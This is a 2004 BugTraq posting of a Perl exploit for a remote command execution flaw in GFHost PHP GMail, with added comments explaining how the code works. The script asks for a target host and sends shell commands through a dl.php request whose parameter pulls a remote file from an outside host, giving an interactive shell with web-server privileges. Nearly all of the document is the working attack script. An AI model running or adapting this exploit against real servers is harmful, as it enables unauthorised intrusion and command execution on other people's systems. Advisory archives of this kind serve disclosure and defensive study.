BugTraq
GFHost PHP GMail remote command execution exploit that achieves webserver id privileges Nov 21 2004 04:11AM
Jerome ATHIAS (jerome athias fr)


##############################################

# GFHost explo

# Spawn bash style Shell with webserver uid

# Greetz SPAX, foxtwo, Zone-H

# This Script is currently under development

##############################################

use strict;

use IO::Socket;

# Script-wide state. None of the subs below takes arguments; they all
# read and write these file-scope lexicals, so the order in which they
# are called (see the bottom of this block) is what makes the values valid.
my $host;        # target host name or IP, read from STDIN by host()

my $port;        # target TCP port, read from STDIN by host(); "80" by default

my $command;     # text connect() appends to the request path

my $url;         # request path currently in use (an element of @U)

my @results;     # response lines collected by connect()

my $probe;       # selects what connect() sends: "string", "scan" or "command"

my @U;           # candidate request paths; slot 0 is filled in by other()

# NOTE(review): this literal is shown wrapped across two lines ("xpl" /
# ".gif"), so as rendered the string contains a newline; the original
# posting most likely had it on one line — confirm before relying on the
# exact value. The "f=" parameter names a remote resource and "cmd=" is
# left empty so connect() can append $command; a request path of the
# form "/dl.php?...&f=http://...&cmd=" is the shape to look for in
# web-server access logs when checking for use of this script.
$U[1] = "/dl.php?a=0.1&OUR_FILE=ff24404eeac528b&f=http://utenti.lycos.it/z00/xpl
.gif&cmd=";

# Main flow: banner and target prompts, probe of each path in @U, path
# selection, interactive command loop, then exit. The "&name;" call form
# passes the caller's @_ through; none of these subs reads @_, so it
# behaves like name() here.
&intro;

&scan;

&choose;

&command;

&exit;

# Start-up sequence: banner, target prompts, server probe, then a short
# pause so the probe output can be read before the screen is cleared.
sub intro {
    help();
    host();
    server();
    sleep 1;
}

# Prompt for the target host and port on STDIN, storing them in the
# script-wide $host and $port. An empty host falls back to 127.0.0.1; a
# port that is empty or contains any non-digit falls back to "80".
sub host {
    print "\nHost or IP : ";
    $host = <STDIN>;
    chomp $host;
    $host = "127.0.0.1" if $host eq "";

    print "\nPort (enter to accept 80): ";
    $port = <STDIN>;
    chomp $port;
    $port = "80" if $port =~ /\D/ or $port eq "";
}

# Send a HEAD request through connect() and report "OK" when one of the
# first eleven collected response lines mentions "apache". The posted
# version also had a non-apache branch that answered its own y/N prompt
# with a hard-coded "y", so it could never exit; only the "OK" message
# is observable and that is all that is kept here.
sub server {
    print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
    $probe = "string";
    &connect();

    my $webserver = "something";
    for my $idx (0 .. 10) {
        my $line = $results[$idx];
        next unless defined $line;
        $webserver = "apache" if $line =~ /apache/;
    }

    print "\n\nOK" if $webserver eq "apache";
}

# Request every candidate path in @U (from index 1; slot 0 is reserved
# for the custom path from other()) with $command set to "dir" and look
# for "Directory" in the reply. The outcome is recorded in $flag and
# $status but never reported or acted on: the if/else after the inner
# loop and the final check are empty, so the lasting effects are only
# the script-wide $command, $url, $probe and @results.
sub scan {

my $status = "not_vulnerable";

print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";

my $loop;

my $output;

my $flag;

# "dir" together with the "Directory" test presumably expects a
# Windows-style listing — inferred from the strings, not confirmed here.
$command="dir";

for ($loop=1; $loop < @U; $loop++) {

$flag = "0";

$url = $U[$loop];

$probe = "scan";

# connect() fills @results but does not print anything for the "scan" probe.
&connect;

foreach $output (@results){

if ($output =~ /Directory/) {

$flag = "1";

$status = "vulnerable";

};

};

# Both branches are empty in the posted script (the header says it is
# still under development); the per-path result is never shown.
if ($flag eq "0") {

}else{

};

};

# Empty as well: nothing tells the user when no path matched.
if ($status eq "not_vulnerable"){

};

};

# Pick the request path from @U. The choice is fixed at "1" rather than
# read from input, so the out-of-range and non-digit re-prompts and the
# index-0 custom-path branch (other()) are never taken; $url is left as
# $U[1].
sub choose {
    my $choice = "1";
    chomp $choice;
    choose() if $choice > @U;
    choose() if $choice =~ /\D/g;
    other()  if $choice == 0;
    $url = $U[$choice];
}

# Read one line from STDIN and store it as the custom request path in
# slot 0 of @U. Only reachable from choose() when the choice is 0, which
# its hard-coded "1" never produces.
sub other {
    my $custom = <STDIN>;
    chomp $custom;
    $U[0] = $custom;
}

# Interactive loop: read a line from STDIN, run the matching keyword
# action, and otherwise hand the line to connect() as $command.
# On entry $command still holds whatever the previous caller left in it
# (scan() sets it to "dir"), and that value is what the loop condition
# sees before the first prompt.
sub command {

while ($command !~/quit/i) {

print "[$host]\$ ";

$command = <STDIN>;

chomp $command;

# Keyword tests are case-insensitive substring matches, so any line that
# merely contains "url", "scan" or "help" triggers that action too.
if ($command =~/quit/i) { &exit };

if ($command =~/url/i) { &choose };

if ($command =~/scan/i) { &scan };

if ($command =~/help/i) { &help };

# Only whitespace is rewritten for the request line; every other
# character is sent as typed.
$command =~ s/\s/+/g;

$probe = "command";

# This gate is case-sensitive, unlike the four tests above, so an
# upper-case keyword is both acted on and still sent to the server.
# NOTE(review): when STDIN reaches EOF, <STDIN> yields undef, neither
# test matches, and the loop appears to keep issuing requests with an
# empty command — confirm.
if ($command !~/quit|url|scan|help/) {&connect};

};

# Reached only when $command already matched "quit" on entry.
&exit;

};

# Open a TCP connection to $host:$port, send the one HTTP request selected
# by $probe, collect the reply into @results and, for some probes, print
# it. All inputs and outputs go through the script-wide variables. The
# name shadows the connect builtin, so only the "&connect" call form
# reaches this sub.
sub connect {

# Dies on failure, so an unreachable host aborts the whole script instead
# of returning to the caller.
my $connection = IO::Socket::INET->new (

Proto => "tcp",

PeerAddr => "$host",

PeerPort => "$port",

) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";

$connection -> autoflush(1);

# "command" and "scan" send $command appended verbatim to the chosen path
# (the caller replaced only whitespace with "+"); "string" sends a bare
# HEAD. Any other $probe value sends nothing and goes straight to the
# read below. No "Connection: close" header is sent, so a server that
# keeps the connection alive would presumably leave the read loop blocked
# until its own idle timeout — confirm before relying on a prompt return.
if ($probe =~/command|scan/){

print $connection "GET $url$command HTTP/1.1\r\nHost: $host\r\n\r\n";

}elsif ($probe =~/string/) {

print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";

};

# The while condition reads the first response line into $_ and discards
# it (the status line); the body then slurps every remaining line into
# @results and the next condition check hits EOF. If nothing is read at
# all, @results keeps whatever an earlier call left in it.
while ( <$connection> ) {

@results = <$connection>;

};

close $connection;

# Only these two probes display the reply; "scan" leaves @results for
# scan() to inspect.
if ($probe eq "command"){ &output };

if ($probe eq "string"){ &output };

};

# Print what connect() collected in @results: for the "string" probe only
# the first eleven slots (skipping undefined ones), for any other probe
# every line.
sub output {
    if ($probe eq "string") {
        for my $idx (0 .. 10) {
            my $line = $results[$idx];
            print "$line" if defined $line;
        }
    }
    else {
        print "$_" for @results;
    }
}

# Print the sign-off and terminate the process. Defining a sub named exit
# does not replace the builtin: callers reach this sub only through the
# &exit form, and the call below is the builtin.
sub exit {
    print "\n\n\n ORP";
    CORE::exit;
}

# Clear the screen with a run of newlines and print the banner: the
# advisory reference, version note and the two prompts the user will see.
# NOTE(review): the two multi-line string literals below are reproduced as
# rendered on the list, including the blank lines inside them; whether the
# original source had those blank lines cannot be told from here.
sub help {

print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";

print "\n

GFHost PHP GMail

Command Execution Vulnerability by SPABAM 2004" ;

print "\n http://www.zone-h.org/advisories/read/id=4904

";

print "\n GFHost.pl Exploit v1.1";

print "\n \n note.. Script under DEVEL";

print "\n";

# "www.victim.com" is a placeholder in the prompt text, not a real target.
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";

# The keywords listed here are the ones command() recognises.
print "\n Command: SCAN URL HELP QUIT";

print "\n\n\n\n\n\n\n\n\n\n\n";

};



 
